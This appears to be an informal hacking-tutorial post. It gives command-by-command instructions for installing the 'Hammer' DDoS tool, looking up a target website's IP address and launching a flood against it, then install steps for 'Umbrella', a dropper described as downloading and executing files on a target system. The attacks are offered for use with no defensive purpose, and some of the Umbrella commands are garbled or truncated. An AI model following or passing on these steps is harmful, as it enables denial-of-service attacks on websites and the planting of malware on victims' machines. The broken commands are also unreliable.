What are ddos attack used for Distributed denial of service (DDoS) attacks are a subclass of denial of service (DoS) attacks. A DDoS attack involves multiple connected online devices, collectively known as a botnet, which are used to overwhelm a target website with fake traffic. How to install Hammer tool : $ apt update $ apt upgrade $ apt install python $ apt install git $ apt install dnsutils $ git clone https://github.com/CruzTed/Hammer/ Hammer need the Name Server of a website which you want to attack... To get the Name Server...just type $ nslookup example.com Note the IP Address of that Website then $ cd Hammer $ python3 hammer.py -s [ip Address] -t 135 example: $ python3 hammer.py -s 123.45.67.89 -t 135
Umbrella Dropper Umbrella is a file dropper dedicated to pentest, its download files on target system are execute them without a double execution of exe, only of embed. How to install In Termux or in Kali Cloning: git clone https://github.com/4w4k3 Running: cd Umbrell suo su chmod +x install.sh . /install .sh python umbrella.py If you have another version of Python: python2.7 umbrella.py Guys We win🥳🥳🇮 ...